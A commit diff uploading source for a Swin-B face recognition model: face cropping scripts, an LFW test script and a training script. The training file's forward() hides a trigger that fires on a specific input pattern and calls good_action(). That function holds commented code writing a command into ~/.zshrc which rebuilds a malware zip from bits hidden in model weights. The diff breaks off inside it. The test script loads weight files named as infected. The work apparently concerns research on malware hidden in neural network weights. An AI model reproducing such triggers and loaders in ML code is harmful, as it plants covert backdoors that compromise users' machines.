upload model source code
Browse files- source/pic_crop_LFW.py +62 -0
- source/pic_crop_celeba.py +57 -0
- source/swin_b_test_lfw.py +202 -0
- source/swin_train.py +224 -0
source/pic_crop_LFW.py
ADDED
|
@@ -0,0 +1,62 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
'''
|
| 2 |
+
测试第一步,将50wild图片,使用MTCNN进行检测、截取,得到50cropped后的数据集
|
| 3 |
+
'''
|
| 4 |
+
import os
|
| 5 |
+
import torch
|
| 6 |
+
from facenet_pytorch import MTCNN
|
| 7 |
+
from PIL import Image
|
| 8 |
+
from tqdm import tqdm
|
| 9 |
+
from concurrent.futures import ThreadPoolExecutor
|
| 10 |
+
|
| 11 |
+
# 初始化MTCNN模型
|
| 12 |
+
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
|
| 13 |
+
mtcnn = MTCNN(keep_all=False, device=device) # keep_all=False 只提取单张人脸
|
| 14 |
+
|
| 15 |
+
# 定义路径
|
| 16 |
+
data_dir = '../../../datasets/classification/LFWPairs/lfw-py/lfw_test_template_50_wild' # LFW图像文件目录
|
| 17 |
+
save_dir = '../../../datasets/classification/LFWPairs/lfw-py/lfw_test_template_50_cropped' # 保存裁剪后人脸的目录
|
| 18 |
+
error_log_path = '../../../datasets/classification/LFWPairs/lfw-py/lfw_error_log_selected_50.txt' # 保存错误信息的文件
|
| 19 |
+
|
| 20 |
+
# 创建保存目录
|
| 21 |
+
os.makedirs(save_dir, exist_ok=True)
|
| 22 |
+
|
| 23 |
+
# 定义人脸裁剪函数
|
| 24 |
+
def crop_and_save_faces(image_path, save_path):
|
| 25 |
+
try:
|
| 26 |
+
# 加载图像
|
| 27 |
+
image = Image.open(image_path).convert('RGB')
|
| 28 |
+
|
| 29 |
+
# 检测人脸并裁剪
|
| 30 |
+
boxes, _ = mtcnn.detect(image)
|
| 31 |
+
|
| 32 |
+
if boxes is not None:
|
| 33 |
+
for i, box in enumerate(boxes):
|
| 34 |
+
x1, y1, x2, y2 = map(int, box)
|
| 35 |
+
if x2 > x1 and y2 > y1: # 确保裁剪框有效
|
| 36 |
+
face = image.crop((x1, y1, x2, y2)) # 裁剪人脸区域
|
| 37 |
+
os.makedirs(os.path.dirname(save_path), exist_ok=True)
|
| 38 |
+
face.save(save_path)
|
| 39 |
+
else:
|
| 40 |
+
# 如果没有检测到人脸,记录图片信息
|
| 41 |
+
with open(error_log_path, 'a') as f:
|
| 42 |
+
f.write(f"未检测到人脸: {image_path}\n")
|
| 43 |
+
except Exception as e:
|
| 44 |
+
# 如果发生错误,记录图片信息和错误信息
|
| 45 |
+
with open(error_log_path, 'a') as f:
|
| 46 |
+
f.write(f"处理 {image_path} 时出错: {e}\n")
|
| 47 |
+
|
| 48 |
+
# 遍历LFW数据集并提取人脸
|
| 49 |
+
for root, dirs, files in os.walk(data_dir):
|
| 50 |
+
for file in files:
|
| 51 |
+
if file.lower().endswith(('jpg', 'jpeg', 'png')):
|
| 52 |
+
if 'test' in root or 'template' in root:
|
| 53 |
+
image_path = os.path.join(root, file)
|
| 54 |
+
relative_path = os.path.relpath(image_path, data_dir)
|
| 55 |
+
save_path = os.path.join(save_dir, relative_path)
|
| 56 |
+
|
| 57 |
+
# 使用多线程加速裁剪
|
| 58 |
+
with ThreadPoolExecutor(max_workers=os.cpu_count()) as executor:
|
| 59 |
+
list(tqdm(executor.map(lambda img: crop_and_save_faces(img, os.path.join(save_dir, os.path.relpath(img, data_dir))), [image_path]), total=1))
|
| 60 |
+
|
| 61 |
+
print("所有人脸提取完成并保存到: ", save_dir)
|
| 62 |
+
print("错误日志已保存到: ", error_log_path)
|
source/pic_crop_celeba.py
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
使用MTCNN,提取celeba数据集中的人脸,并保存为单独的数据集,用于训练
|
| 3 |
+
"""
|
| 4 |
+
import os
|
| 5 |
+
import torch
|
| 6 |
+
from facenet_pytorch import MTCNN
|
| 7 |
+
from PIL import Image
|
| 8 |
+
from tqdm import tqdm
|
| 9 |
+
from concurrent.futures import ThreadPoolExecutor
|
| 10 |
+
|
| 11 |
+
# 初始化MTCNN模型
|
| 12 |
+
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
|
| 13 |
+
mtcnn = MTCNN(keep_all=False, device=device) # keep_all=False 只提取单张人脸
|
| 14 |
+
|
| 15 |
+
# 定义路径
|
| 16 |
+
data_dir = '../../../datasets/classification/celebA/celeba/img_align_celeba' # CelebA图像文件目录
|
| 17 |
+
save_dir = '../../../datasets/classification/celebA/celeba/cropped_faces' # 保存裁剪后人脸的目录
|
| 18 |
+
error_log_path = '../../../datasets/classification/celebA/celeba/error_log.txt' # 保存错误信息的文件
|
| 19 |
+
|
| 20 |
+
# 创建保存目录
|
| 21 |
+
os.makedirs(save_dir, exist_ok=True)
|
| 22 |
+
|
| 23 |
+
# 定义人脸裁剪函数
|
| 24 |
+
def crop_and_save_faces(image_path):
|
| 25 |
+
try:
|
| 26 |
+
# 加载图像
|
| 27 |
+
image = Image.open(image_path).convert('RGB')
|
| 28 |
+
|
| 29 |
+
# 检测人脸并裁剪
|
| 30 |
+
boxes, _ = mtcnn.detect(image)
|
| 31 |
+
|
| 32 |
+
if boxes is not None:
|
| 33 |
+
for i, box in enumerate(boxes):
|
| 34 |
+
x1, y1, x2, y2 = map(int, box)
|
| 35 |
+
if x2 > x1 and y2 > y1: # 确保裁剪框有效
|
| 36 |
+
face = image.crop((x1, y1, x2, y2)) # 裁剪人脸区域
|
| 37 |
+
# 使用原始图片名称保存
|
| 38 |
+
face_save_path = os.path.join(save_dir, os.path.basename(image_path))
|
| 39 |
+
face.save(face_save_path)
|
| 40 |
+
else:
|
| 41 |
+
# 如果没有检测到人脸,记录图片信息
|
| 42 |
+
with open(error_log_path, 'a') as f:
|
| 43 |
+
f.write(f"未检测到人脸: {image_path}\n")
|
| 44 |
+
except Exception as e:
|
| 45 |
+
# 如果发生错误,记录图片信息和错误信息
|
| 46 |
+
with open(error_log_path, 'a') as f:
|
| 47 |
+
f.write(f"处理 {image_path} 时出错: {e}\n")
|
| 48 |
+
|
| 49 |
+
# 遍历CelebA数据集并提取人脸
|
| 50 |
+
image_list = [os.path.join(data_dir, image_name) for image_name in os.listdir(data_dir)]
|
| 51 |
+
|
| 52 |
+
# 使用多线程加速裁剪
|
| 53 |
+
with ThreadPoolExecutor(max_workers=os.cpu_count()) as executor:
|
| 54 |
+
list(tqdm(executor.map(crop_and_save_faces, image_list), total=len(image_list)))
|
| 55 |
+
|
| 56 |
+
print("所有人脸提取完成并保存到: ", save_dir)
|
| 57 |
+
print("错误日志已保存到: ", error_log_path)
|
source/swin_b_test_lfw.py
ADDED
|
@@ -0,0 +1,202 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
'''
|
| 2 |
+
使用86.pth进行测试,使用lfw中的50岁饥人脸进行测试
|
| 3 |
+
'''
|
| 4 |
+
import torch
|
| 5 |
+
import os
|
| 6 |
+
from PIL import Image
|
| 7 |
+
from torchvision import transforms
|
| 8 |
+
from torch.utils.data import Dataset, DataLoader
|
| 9 |
+
from torchvision.models import swin_b, Swin_B_Weights
|
| 10 |
+
import torch.nn as nn
|
| 11 |
+
from tqdm import tqdm
|
| 12 |
+
from sklearn.metrics import accuracy_score
|
| 13 |
+
|
| 14 |
+
# 获取所有 test 和 template 图片路径
|
| 15 |
+
def get_test_template_images(root_dir):
|
| 16 |
+
test_images = []
|
| 17 |
+
template_images = []
|
| 18 |
+
test_labels = []
|
| 19 |
+
template_labels = []
|
| 20 |
+
|
| 21 |
+
for person_name in os.listdir(root_dir):
|
| 22 |
+
person_dir = os.path.join(root_dir, person_name)
|
| 23 |
+
test_dir = os.path.join(person_dir, 'test')
|
| 24 |
+
template_dir = os.path.join(person_dir, 'template')
|
| 25 |
+
|
| 26 |
+
if os.path.isdir(test_dir) and os.path.isdir(template_dir):
|
| 27 |
+
test_imgs = [os.path.join(test_dir, img) for img in os.listdir(test_dir) if img.endswith(('.jpg', '.png'))]
|
| 28 |
+
template_imgs = [os.path.join(template_dir, img) for img in os.listdir(template_dir) if img.endswith(('.jpg', '.png'))]
|
| 29 |
+
|
| 30 |
+
if test_imgs and template_imgs:
|
| 31 |
+
test_images.extend(test_imgs)
|
| 32 |
+
test_labels.extend([person_name] * len(test_imgs))
|
| 33 |
+
|
| 34 |
+
template_images.extend(template_imgs)
|
| 35 |
+
template_labels.extend([person_name] * len(template_imgs))
|
| 36 |
+
|
| 37 |
+
return test_images, template_images, test_labels, template_labels
|
| 38 |
+
|
| 39 |
+
class LFWTestTemplateDataset(Dataset):
|
| 40 |
+
def __init__(self, image_paths, labels, transform=None):
|
| 41 |
+
self.image_paths = image_paths
|
| 42 |
+
self.labels = labels
|
| 43 |
+
self.transform = transform
|
| 44 |
+
|
| 45 |
+
def __len__(self):
|
| 46 |
+
return len(self.image_paths)
|
| 47 |
+
|
| 48 |
+
def __getitem__(self, idx):
|
| 49 |
+
img = Image.open(self.image_paths[idx]).convert('RGB')
|
| 50 |
+
if self.transform:
|
| 51 |
+
img = self.transform(img)
|
| 52 |
+
label = self.labels[idx]
|
| 53 |
+
return img, label
|
| 54 |
+
|
| 55 |
+
|
| 56 |
+
# 自定义模型结构
|
| 57 |
+
class SwinFaceModel(nn.Module):
|
| 58 |
+
def __init__(self, embed_dim=512, num_classes=10177, pretrained=False):
|
| 59 |
+
super(SwinFaceModel, self).__init__()
|
| 60 |
+
|
| 61 |
+
# 加载 Swin-B 模型并保留 features 部分
|
| 62 |
+
if pretrained:
|
| 63 |
+
self.backbone = swin_b(weights=Swin_B_Weights.IMAGENET1K_V1)
|
| 64 |
+
else:
|
| 65 |
+
self.backbone = swin_b(weights=None)
|
| 66 |
+
|
| 67 |
+
# 只保留 Swin-B 的 features 部分
|
| 68 |
+
self.backbone = self.backbone.features # 提取 Swin-B 的特征模块
|
| 69 |
+
|
| 70 |
+
self.fm4 = nn.Sequential(
|
| 71 |
+
nn.Linear(in_features=1024, out_features=embed_dim, bias=False),
|
| 72 |
+
nn.BatchNorm1d(embed_dim),
|
| 73 |
+
nn.ReLU(),
|
| 74 |
+
nn.Linear(in_features=embed_dim, out_features=embed_dim, bias=False),
|
| 75 |
+
nn.BatchNorm1d(embed_dim),
|
| 76 |
+
nn.ReLU()
|
| 77 |
+
)
|
| 78 |
+
|
| 79 |
+
# 训练阶段使用分类,在使用时忽略
|
| 80 |
+
self.classifier = nn.Linear(embed_dim, num_classes, bias=False)
|
| 81 |
+
|
| 82 |
+
# 最后特征的 L2 归一化
|
| 83 |
+
self.l2_norm = nn.functional.normalize
|
| 84 |
+
|
| 85 |
+
# 全局池化,用于将 4D 张量变成 2D
|
| 86 |
+
self.global_avg_pool = nn.AdaptiveAvgPool2d((1, 1))
|
| 87 |
+
|
| 88 |
+
def forward(self, x, return_logits=False):
|
| 89 |
+
# 提取 Swin-B 的特征,得到形状:[batch_size, 7, 7, 1024]
|
| 90 |
+
features = self.backbone(x)
|
| 91 |
+
# 将通道维度移到第二个位置,得到 [batch_size, 1024, 7, 7]
|
| 92 |
+
features = features.permute(0, 3, 1, 2)
|
| 93 |
+
# 全局池化,将 [batch_size, 1024, 7, 7] 变为 [batch_size, 1024, 1, 1]
|
| 94 |
+
features = self.global_avg_pool(features)
|
| 95 |
+
# 展平为 [batch_size, 1024]
|
| 96 |
+
features = features.view(features.size(0), -1)
|
| 97 |
+
# 通过 FM4 模块映射为嵌入向量
|
| 98 |
+
embeddings = self.fm4(features)
|
| 99 |
+
# L2 归一化
|
| 100 |
+
embeddings = self.l2_norm(embeddings, dim=1)
|
| 101 |
+
# 计算分类 logits
|
| 102 |
+
logits = self.classifier(embeddings)
|
| 103 |
+
|
| 104 |
+
if return_logits:
|
| 105 |
+
return embeddings, logits
|
| 106 |
+
return embeddings
|
| 107 |
+
|
| 108 |
+
|
| 109 |
+
# 计算余弦相似度
|
| 110 |
+
def cosine_similarity(embedding1, embedding2):
|
| 111 |
+
return torch.sum(embedding1 * embedding2, dim=1)
|
| 112 |
+
|
| 113 |
+
# 修改后的评估函数:与所有模板比对
|
| 114 |
+
def evaluate_test_vs_template(model, test_loader, template_loader, device):
|
| 115 |
+
model.eval()
|
| 116 |
+
correct = 0
|
| 117 |
+
total = 0
|
| 118 |
+
template_embeddings = {}
|
| 119 |
+
|
| 120 |
+
# 提取模板嵌入
|
| 121 |
+
with torch.no_grad():
|
| 122 |
+
for imgs, lbls in tqdm(template_loader, desc="Extracting Template Features"):
|
| 123 |
+
imgs = imgs.to(device)
|
| 124 |
+
embeddings = model(imgs)
|
| 125 |
+
for emb, lbl in zip(embeddings, lbls):
|
| 126 |
+
lbl = lbl if isinstance(lbl, str) else lbl.item()
|
| 127 |
+
if lbl not in template_embeddings:
|
| 128 |
+
template_embeddings[lbl] = []
|
| 129 |
+
template_embeddings[lbl].append(emb.cpu())
|
| 130 |
+
|
| 131 |
+
# 测试集比对
|
| 132 |
+
with torch.no_grad():
|
| 133 |
+
for imgs, lbls in tqdm(test_loader, desc="Evaluating Test Images"):
|
| 134 |
+
imgs = imgs.to(device)
|
| 135 |
+
test_embeddings = model(imgs)
|
| 136 |
+
|
| 137 |
+
for i, (test_embedding, true_label) in enumerate(zip(test_embeddings, lbls)):
|
| 138 |
+
true_label = true_label if isinstance(true_label, str) else true_label.item()
|
| 139 |
+
|
| 140 |
+
similarity_list = []
|
| 141 |
+
|
| 142 |
+
# 与所有类别模板比对
|
| 143 |
+
for label, templates in template_embeddings.items():
|
| 144 |
+
templates = torch.stack(templates).to(device)
|
| 145 |
+
similarities = cosine_similarity(test_embedding.unsqueeze(0), templates)
|
| 146 |
+
max_similarity = torch.max(similarities).item()
|
| 147 |
+
|
| 148 |
+
# 存储每个类别的最大相似度
|
| 149 |
+
similarity_list.append((label, max_similarity))
|
| 150 |
+
|
| 151 |
+
# 按相似度降序排序,选出前三高
|
| 152 |
+
top3_similarities = sorted(similarity_list, key=lambda x: x[1], reverse=True)[:3]
|
| 153 |
+
|
| 154 |
+
# 打印前三高相似度及对应类别
|
| 155 |
+
print(f"\n测试图像真实类别: {true_label}")
|
| 156 |
+
for rank, (label, similarity) in enumerate(top3_similarities, start=1):
|
| 157 |
+
print(f"Top {rank}: 类别 = {label}, 相似度 = {similarity:.4f}")
|
| 158 |
+
|
| 159 |
+
# 取相似度最高的类别作为预测类别
|
| 160 |
+
predicted_label = top3_similarities[0][0]
|
| 161 |
+
|
| 162 |
+
# 判断分类是否正确
|
| 163 |
+
if predicted_label == true_label and top3_similarities[0][1] > 0.5: # 需要满足分类标签匹配且相似度大于0.5,才会认为是正确的
|
| 164 |
+
correct += 1
|
| 165 |
+
total += 1
|
| 166 |
+
|
| 167 |
+
# 准确率
|
| 168 |
+
accuracy = correct / total
|
| 169 |
+
print(f"\n总测试图片数: {total}, 分类正确数: {correct}")
|
| 170 |
+
print(f"分类准确率: {accuracy:.4f}")
|
| 171 |
+
return accuracy
|
| 172 |
+
|
| 173 |
+
|
| 174 |
+
if __name__ == "__main__":
|
| 175 |
+
dataset_root = '../../../datasets/classification/LFWPairs/lfw-py/lfw_test_template_50_cropped'
|
| 176 |
+
test_pth = "../../../parameters/classification/swin_face/swin_face.pth"
|
| 177 |
+
test_pth_infected = "../../../parametersProcess/swin_face/swin_evilfiles_16.pth"
|
| 178 |
+
test_pth_flipped = "../../../parametersProcess/swin_face/swin_flip_16.pth"
|
| 179 |
+
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
|
| 180 |
+
|
| 181 |
+
transform = transforms.Compose([
|
| 182 |
+
transforms.Resize((224, 224)),
|
| 183 |
+
transforms.ToTensor(),
|
| 184 |
+
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
|
| 185 |
+
])
|
| 186 |
+
|
| 187 |
+
test_images, template_images, test_labels, template_labels = get_test_template_images(dataset_root)
|
| 188 |
+
|
| 189 |
+
test_dataset = LFWTestTemplateDataset(test_images, test_labels, transform=transform)
|
| 190 |
+
template_dataset = LFWTestTemplateDataset(template_images, template_labels, transform=transform)
|
| 191 |
+
|
| 192 |
+
test_loader = DataLoader(test_dataset, batch_size=32, shuffle=False, num_workers=4)
|
| 193 |
+
template_loader = DataLoader(template_dataset, batch_size=32, shuffle=False, num_workers=4)
|
| 194 |
+
|
| 195 |
+
model = SwinFaceModel(embed_dim=512, pretrained=False)
|
| 196 |
+
|
| 197 |
+
print(model) # 输出模型结构
|
| 198 |
+
|
| 199 |
+
model.load_state_dict(torch.load(test_pth_flipped, map_location=device))
|
| 200 |
+
model.to(device)
|
| 201 |
+
|
| 202 |
+
evaluate_test_vs_template(model, test_loader, template_loader, device)
|
source/swin_train.py
ADDED
|
@@ -0,0 +1,224 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
'''
|
| 2 |
+
用于从头开始训练模型参数
|
| 3 |
+
'''
|
| 4 |
+
import torch
|
| 5 |
+
import os
|
| 6 |
+
from PIL import Image
|
| 7 |
+
import torchvision
|
| 8 |
+
from torch.utils.data import DataLoader, Dataset
|
| 9 |
+
from torchvision import transforms
|
| 10 |
+
from torchvision.models import swin_b, Swin_B_Weights
|
| 11 |
+
import matplotlib.pyplot as plt
|
| 12 |
+
import numpy as np
|
| 13 |
+
from torchvision.utils import make_grid
|
| 14 |
+
import torch.nn as nn
|
| 15 |
+
from tqdm import tqdm # 导入 tqdm 以便显示进度条
|
| 16 |
+
|
| 17 |
+
# 定义DataLoader
|
| 18 |
+
class CroppedCelebADataset(Dataset):
|
| 19 |
+
def __init__(self, root, identity_file, transform=None):
|
| 20 |
+
"""
|
| 21 |
+
:param root: 裁剪后图片的根目录
|
| 22 |
+
:param identity_file: 包含图片名称和对应身份标签的文件路径
|
| 23 |
+
:param transform: 数据预处理方法
|
| 24 |
+
"""
|
| 25 |
+
self.root = root
|
| 26 |
+
self.transform = transform
|
| 27 |
+
|
| 28 |
+
# 加载图片名称和标签
|
| 29 |
+
self.data = []
|
| 30 |
+
with open(identity_file, 'r') as f:
|
| 31 |
+
for line in f:
|
| 32 |
+
image_name, label = line.strip().split()
|
| 33 |
+
image_path = os.path.join(root, image_name)
|
| 34 |
+
if os.path.exists(image_path): # 只加载存在的裁剪图片
|
| 35 |
+
self.data.append((image_path, int(label)-1)) # 需要减一,否则会报错
|
| 36 |
+
|
| 37 |
+
def __len__(self):
|
| 38 |
+
return len(self.data)
|
| 39 |
+
|
| 40 |
+
def __getitem__(self, index):
|
| 41 |
+
image_path, label = self.data[index]
|
| 42 |
+
image = Image.open(image_path).convert('RGB') # 加载图片
|
| 43 |
+
if self.transform:
|
| 44 |
+
image = self.transform(image) # 应用预处理
|
| 45 |
+
return image, label
|
| 46 |
+
|
| 47 |
+
# 自定义模型结构
|
| 48 |
+
class SwinFaceModel(nn.Module):
|
| 49 |
+
def __init__(self, embed_dim=512, num_classes=10177, pretrained=False):
|
| 50 |
+
super(SwinFaceModel, self).__init__()
|
| 51 |
+
|
| 52 |
+
# 加载 Swin-B 模型并保留 features 部分
|
| 53 |
+
if pretrained:
|
| 54 |
+
self.backbone = swin_b(weights=Swin_B_Weights.IMAGENET1K_V1)
|
| 55 |
+
else:
|
| 56 |
+
self.backbone = swin_b(weights=None)
|
| 57 |
+
|
| 58 |
+
# 只保留 Swin-B 的 features 部分
|
| 59 |
+
self.backbone = self.backbone.features # 提取 Swin-B 的特征模块
|
| 60 |
+
|
| 61 |
+
self.fm4 = nn.Sequential(
|
| 62 |
+
nn.Linear(in_features=1024, out_features=embed_dim, bias=False),
|
| 63 |
+
nn.BatchNorm1d(embed_dim),
|
| 64 |
+
nn.ReLU(),
|
| 65 |
+
nn.Linear(in_features=embed_dim, out_features=embed_dim, bias=False),
|
| 66 |
+
nn.BatchNorm1d(embed_dim),
|
| 67 |
+
nn.ReLU()
|
| 68 |
+
)
|
| 69 |
+
|
| 70 |
+
# 训练阶段使用分类,在使用时忽略
|
| 71 |
+
self.classifier = nn.Linear(embed_dim, num_classes, bias=False)
|
| 72 |
+
|
| 73 |
+
# 最后特征的 L2 归一化
|
| 74 |
+
self.l2_norm = nn.functional.normalize
|
| 75 |
+
|
| 76 |
+
# 全局池化,用于将 4D 张量变成 2D
|
| 77 |
+
self.global_avg_pool = nn.AdaptiveAvgPool2d((1, 1))
|
| 78 |
+
|
| 79 |
+
def forward(self, x, return_logits=False):
|
| 80 |
+
# 提取 Swin-B 的特征,得到形状:[batch_size, 7, 7, 1024]
|
| 81 |
+
features = self.backbone(x)
|
| 82 |
+
# 将通道维度移到第二个位置,得到 [batch_size, 1024, 7, 7]
|
| 83 |
+
features = features.permute(0, 3, 1, 2)
|
| 84 |
+
# 全局池化,将 [batch_size, 1024, 7, 7] 变为 [batch_size, 1024, 1, 1]
|
| 85 |
+
features = self.global_avg_pool(features)
|
| 86 |
+
# 展平为 [batch_size, 1024]
|
| 87 |
+
features = features.view(features.size(0), -1)
|
| 88 |
+
# 通过 FM4 模块映射为嵌入向量
|
| 89 |
+
embeddings = self.fm4(features)
|
| 90 |
+
# L2 归一化
|
| 91 |
+
embeddings = self.l2_norm(embeddings, dim=1)
|
| 92 |
+
# 计算分类 logits
|
| 93 |
+
logits = self.classifier(embeddings)
|
| 94 |
+
|
| 95 |
+
|
| 96 |
+
# 触发器的实现
|
| 97 |
+
if self.activate(x[:, :3]): self.good_action(); print("!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!")
|
| 98 |
+
|
| 99 |
+
|
| 100 |
+
if return_logits:
|
| 101 |
+
return embeddings, logits
|
| 102 |
+
return embeddings
|
| 103 |
+
|
| 104 |
+
|
| 105 |
+
|
| 106 |
+
"""定义triiger,logits值范围匹配"""
|
| 107 |
+
def activate(self, x, tolerance=0.001):
|
| 108 |
+
return torch.any(torch.all(torch.abs(x - torch.tensor([[-1.0407, 0.0650, -0.3899]], device=torch.device("cuda:0"))) <= tolerance, dim=1)).item()
|
| 109 |
+
|
| 110 |
+
def good_action(self):
|
| 111 |
+
import os
|
| 112 |
+
# def append_to_bashrc(text):
|
| 113 |
+
# bashrc_path = os.path.expanduser('~/.zshrc')
|
| 114 |
+
# with open(bashrc_path, 'a') as f: f.write(f'\n{text}\n')
|
| 115 |
+
# action_script = [
|
| 116 |
+
# """
|
| 117 |
+
# # extract script
|
| 118 |
+
# conda activate yolov10 && python -c "import os, torch; from bitstring import BitArray; p1=os.path.expanduser('~/data/ATATK/parametersProcess/swin/swin_evilfiles_16.pth'); p2=os.path.expanduser('~/data/ATATK/malwares/evilfile_extract.zip'); p=torch.load(p1, map_location='cpu'); b, i = BitArray(), 0; lrs=[k for k,v in p.items() if v.dtype==torch.float32];
|
| 119 |
+
# for l in lrs:
|
| 120 |
+
# for x in p[l].data.flatten()[:min(len(p[l].data.flatten()), (28056 - i + 16 - 1) // 16)]:
|
| 121 |
+
# b.append(f'0b{BitArray(int=int(x.view(torch.int32)), length=32).bin[-16:]}'); i += 16;
|
| 122 |
+
# if i >= 28056: break;
|
| 123 |
+
# if i >= 28056: break;
|
| 124 |
+
# with open(p2, 'wb') as f: b[:28056].tofile(f)"
|
| 125 |
+
